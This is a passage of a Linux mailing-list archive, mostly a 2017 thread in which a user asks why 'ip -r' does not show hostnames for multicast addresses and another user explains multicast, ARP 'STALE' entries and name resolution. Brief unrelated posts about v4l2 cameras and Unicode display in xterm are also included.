> correspondence) has very limited lifetime (30 seconds by default
> IIRC). STALE shows you that this host haven't send any packets to
> these hosts in last 30 seconds.
>
> Also, ip-neighbour(8).
>

> > >Frankly I'm not surprised that it failed to resolve 224.0.0.251.
> > > Nobody sane would add a DNS record for this anyway.
> >
> > I think thats from avahi, is definitely is not anything I have
> > configured.
>
> Multicasts are not anything that *anyone* should configure.
> The whole idea of them is that your L2 network segment configures by
> itself.
>
> Reco


Cheers, Gene Heskett
-- 
"There are four boxes to be used in defense of liberty:
 soap, ballot, jury, and ammo. Please use in that order."
-Ed Howdershelt (Author)
Genes Web page 

Re: This (new to me) ip thingy

[Gene Heskett]

On Tuesday 03 October 2017 04:17:49 Reco wrote:

>   Hi.
>
> On Tue, Oct 03, 2017 at 04:04:56AM -0400, Gene Heskett wrote:
> > On Tuesday 03 October 2017 03:02:42 Reco wrote:
> > > ip -r n s
> >
> > returns this unsorted list:
> > rock64Sheldon.coyote.den dev eth0 lladdr 3e:1b:98:17:e3:8c STALE
> > scanner.coyote.den dev eth0 lladdr 30:05:5c:8a:2d:c8 STALE
> > picnc.coyote.den dev eth0 lladdr b8:27:eb:d3:47:2d STALE
> > lathe.coyote.den dev eth0 lladdr 38:60:77:cd:f3:2f STALE
> > router.coyote.den dev eth0 lladdr 4c:e6:76:ad:34:0a STALE
> > GO704.coyote.den dev eth0 lladdr 00:1a:a0:a7:a8:d4 STALE
> > shop.coyote.den dev eth0 lladdr 38:60:77:4e:38:1b STALE
> >
> > No clue why it should mark them all as stale except they've been up
> > since the last power failure. This room is the only UPS and not all
> > of it is on the UPS.  I also have a 20kw nat-gas standby in the
> > backyard, so failures are just short enough to screw up the
> > auto-reboot settings.
>
> STALE has nothing to do with it. A typical ARP record (MAC-IP
> correspondence) has very limited lifetime (30 seconds by default
> IIRC). STALE shows you that this host haven't send any packets to
> these hosts in last 30 seconds.
>
> Also, ip-neighbour(8).
>
> > >Frankly I'm not surprised that it failed to resolve 224.0.0.251.
> > > Nobody sane would add a DNS record for this anyway.
> >
> > I think thats from avahi, is definitely is not anything I have
> > configured.
>
> Multicasts are not anything that *anyone* should configure.
> The whole idea of them is that your L2 network segment configures by
> itself.
>
> Reco

In that class A? Not even my isp has anything there.  Its not a pingable 
address from here as I believe dd-wrt would stop it, nor does whois have 
a clue. NSA back door?  Damnifiknow. Traceroute gets zero response too.  
So what or who is it?

Thanks.

Cheers, Gene Heskett
-- 
"There are four boxes to be used in defense of liberty:
 soap, ballot, jury, and ammo. Please use in that order."
-Ed Howdershelt (Author)
Genes Web page 

Re: This (new to me) ip thingy

[Reco]

Hi.

On Tue, Oct 03, 2017 at 04:04:56AM -0400, Gene Heskett wrote:
> On Tuesday 03 October 2017 03:02:42 Reco wrote:
> 
> > ip -r n s
> returns this unsorted list:
> rock64Sheldon.coyote.den dev eth0 lladdr 3e:1b:98:17:e3:8c STALE
> scanner.coyote.den dev eth0 lladdr 30:05:5c:8a:2d:c8 STALE
> picnc.coyote.den dev eth0 lladdr b8:27:eb:d3:47:2d STALE
> lathe.coyote.den dev eth0 lladdr 38:60:77:cd:f3:2f STALE
> router.coyote.den dev eth0 lladdr 4c:e6:76:ad:34:0a STALE
> GO704.coyote.den dev eth0 lladdr 00:1a:a0:a7:a8:d4 STALE
> shop.coyote.den dev eth0 lladdr 38:60:77:4e:38:1b STALE
> 
> No clue why it should mark them all as stale except they've been up since 
> the last power failure. This room is the only UPS and not all of it is 
> on the UPS.  I also have a 20kw nat-gas standby in the backyard, so 
> failures are just short enough to screw up the auto-reboot settings.

STALE has nothing to do with it. A typical ARP record (MAC-IP
correspondence) has very limited lifetime (30 seconds by default IIRC).
STALE shows you that this host haven't send any packets to these hosts
in last 30 seconds.

Also, ip-neighbour(8).


> >Frankly I'm not surprised that it failed to resolve 224.0.0.251. Nobody
> >sane would add a DNS record for this anyway.
> 
> I think thats from avahi, is definitely is not anything I have 
> configured.

Multicasts are not anything that *anyone* should configure.
The whole idea of them is that your L2 network segment configures by
itself.

Reco

Re: This (new to me) ip thingy

[Gene Heskett]

On Tuesday 03 October 2017 03:02:42 Reco wrote:

> ip -r n s
returns this unsorted list:
rock64Sheldon.coyote.den dev eth0 lladdr 3e:1b:98:17:e3:8c STALE
scanner.coyote.den dev eth0 lladdr 30:05:5c:8a:2d:c8 STALE
picnc.coyote.den dev eth0 lladdr b8:27:eb:d3:47:2d STALE
lathe.coyote.den dev eth0 lladdr 38:60:77:cd:f3:2f STALE
router.coyote.den dev eth0 lladdr 4c:e6:76:ad:34:0a STALE
GO704.coyote.den dev eth0 lladdr 00:1a:a0:a7:a8:d4 STALE
shop.coyote.den dev eth0 lladdr 38:60:77:4e:38:1b STALE

No clue why it should mark them all as stale except they've been up since 
the last power failure. This room is the only UPS and not all of it is 
on the UPS.  I also have a 20kw nat-gas standby in the backyard, so 
failures are just short enough to screw up the auto-reboot settings.

>Frankly I'm not surprised that it failed to resolve 224.0.0.251. Nobody
>sane would add a DNS record for this anyway.

I think thats from avahi, is definitely is not anything I have 
configured.

Scanner is also one of the printers, its an MFC, can do tabloid if I hand 
feed it.  Good for shrinking the page count of a rockhopper printout. 
Rockhopper can survey a running linuxcnc machine and give you a logic 
diagram of it.  Handier than that famous button on the outhouse door for 
troubleshooting a complex configuration. But its output, even on 11x17 
paper can run to 6 to 8 sheets that have to be pasted up into a poster.

Cheers, Gene Heskett
-- 
"There are four boxes to be used in defense of liberty:
 soap, ballot, jury, and ammo. Please use in that order."
-Ed Howdershelt (Author)
Genes Web page 

Re: v4l2 cameras in stretch.

[deloptes]

pe...@easthope.ca wrote:

> Is any camera working via v4l2 in stretch?  None found here.

I was using Haupauge PVR like 10y ago. It is possible that the one you have
is not fully supported because of lack of information.
Another option is that you have to configure this and that

http://www.hauppauge.com/site/support/linux.html
https://ubuntuforums.org/showthread.php?t=1634445

hope this helps 

regards

Re: This (new to me) ip thingy

[Reco]

Hi.

On Tue, Oct 03, 2017 at 02:32:29AM -0400, Gene Heskett wrote:
> Greetings;
> 
> Confusion still reigns here.
> For instance:
> oot@coyote:~# ip m l eth0
> 2:  eth0
> link  01:00:5e:00:00:01
> link  33:33:00:00:02:02
> link  33:33:00:00:00:01
> link  01:00:5e:00:00:fb
> link  33:33:ff:62:fc:bb
> link  33:33:00:00:00:fb
> inet  224.0.0.251
> inet  224.0.0.1
> inet6 ff02::fb
> inet6 ff02::1:ff62:fcbb
> inet6 ff02::202
> inet6 ff02::1
> inet6 ff01::1

So, multicasts. Ok.

> But add - -r so its supposed to show names, and get:
> 2:  eth0
> link  01:00:5e:00:00:01
> link  33:33:00:00:02:02
> link  33:33:00:00:00:01
> link  01:00:5e:00:00:fb
> link  33:33:ff:62:fc:bb
> link  33:33:00:00:00:fb
> inet  (5 second pause) 224.0.0.251
> inet  all-systems.mcast.net
> inet6 ff02::fb
> inet6 ff02::1:ff62:fcbb
> inet6 ff02::202
> inet6 ip6-allnodes
> inet6 ff01::1
> Which, according to the manpage and my interpretation, should resolv the 
> names those 6 (mac?) addresses belong to.

No, it should not. It means:

-r, -resolve use the system's name resolver to print DNS names instead
of host addresses.

So, in plain English - if it is an IP address - it will be resolved.
If it is an IPv6 address - it will be resolved too.
At least ip will try to do so via /etc/hosts, DNS requests and other
name resolution methods all according to your /etc/nsswitch.conf.

To translate MACs to IPs you need to do ARP requests (ICMPv6 if you need
IPv6 addresses). Try "ip -r n s" instead.


> So while its seemingly working at the net hardwares speed, I think its 
> telling me I am miss-configured somehow. There are not any ipv6 addresses in 
> the hosts file that would translate to the same name as the machines given 
> name. I tried that several years ago and it caused errors at the time.

Run "tcpdump -nvi any udp port 53 or tcp port 53 or udp port 5353".
Run "ip -r m l eth0" alongside with it.
Watch the result.

Frankly I'm not surprised that it failed to resolve 224.0.0.251. Nobody
sane would add a DNS record for this anyway.

Reco

Re: SOLVED - Re: xfce4-terminal fails to “pass through” environment variables

[tomas]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Tue, Oct 03, 2017 at 08:25:40AM +1100, Zenaan Harkness wrote:

[...]

> Tomas - I will try your Liberation font suggestion, but xfce term is
> giving me a rock solid "Fixed" experience, AND the fancy character
> dancing... for me, this is peak productivity and sublime visuals to
> boot :)

:-)

> Here's a sample of unicode chars:

FWIW -- "my" xterm doesn't show all of them. Emacs, which is my
reference in all things Unicode (and most other things too) displays
them all.

I'll put a star under those which show as boxes in my xterm setup
(seems Liberation needs some help):

This, dear reader assumes you are reading in monospace (Zenaan, I
know you do, but think of those poor souls bound to a Web interface ;-)

> ← ↑ ↓ → ⋱ ⋰ ⇄ ※
  * *   *

> ⨡ ⨠ ⨟ ⋿ ⦂ ⊙ ⦀ ∣ ⇉ ↦ ⨾
  * * * * *   *   *

> ⟩ ⟨ ❵ ❴ ¦ ‖ ¡ ‼ µ ♮ ♯


> π ∞ ‡ ♥ ∑ ⁽ ⁾ ₎ ₍ ∙


> … † ° ¤ № ¶ — ≡ ± ⫶ ∴
*

(that makes roughly 20% failure rate on your sample, whatever
that means).

Cheers
- -- tomás
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlnTL78ACgkQBcgs9XrR2kaApgCfbBQveaJCGpHE1T0AlMstGDO3
/1IAn1LCAt2Nt+kKEhACKXDlmN+Ope70
=Atpj
-END PGP SIGNATURE-

This (new to me) ip thingy

[Gene Heskett]

Greetings;

Confusion still reigns here.
For instance:
oot@coyote:~# ip m l eth0
2:  eth0
link  01:00:5e:00:00:01
link  33:33:00:00:02:02
link  33:33:00:00:00:01
link  01:00:5e:00:00:fb
link  33:33:ff:62:fc:bb
link  33:33:00:00:00:fb
inet  224.0.0.251
inet  224.0.0.1
inet6 ff02::fb
inet6 ff02::1:ff62:fcbb
inet6 ff02::202
inet6 ff02::1
inet6 ff01::1

But add - -r so its supposed to show names, and get:
2:  eth0
link  01:00:5e:00:00:01
link  33:33:00:00:02:02
link  33:33:00:00:00:01
link  01:00:5e:00:00:fb
link  33:33:ff:62:fc:bb
link  33:33:00:00:00:fb
inet  (5 second pause) 224.0.0.251
inet  all-systems.mcast.net
inet6 ff02::fb
inet6 ff02::1:ff62:fcbb
inet6 ff02::202
inet6 ip6-allnodes
inet6 ff01::1
Which, according to the manpage and my interpretation, should resolv the names 
those 6 (mac?) addresses belong to.  So while its seemingly working at the net 
hardwares speed, I think its telling me I am miss-configured somehow. There are 
not any ipv6 addresses in the hosts file that would translate to the same name 
as the machines given name. I tried that several years ago and it caused errors 
at the time.

This is an all static local network, with dns provided by everything here 
pointed at the router for nameservice that's not in the hosts file, running 
dnsmasq, which in turn forwards any dns lookups it doesn't have the answer to 
cached, to my ISP's servers.

Shouldn't the -r version show FQDN's?  And why is it not?

Thanks.

Cheers, Gene Heskett
-- 
"There are four boxes to be used in defense of liberty:
 soap, ballot, jury, and ammo. Please use in that order."
-Ed Howdershelt (Author)
Genes Web page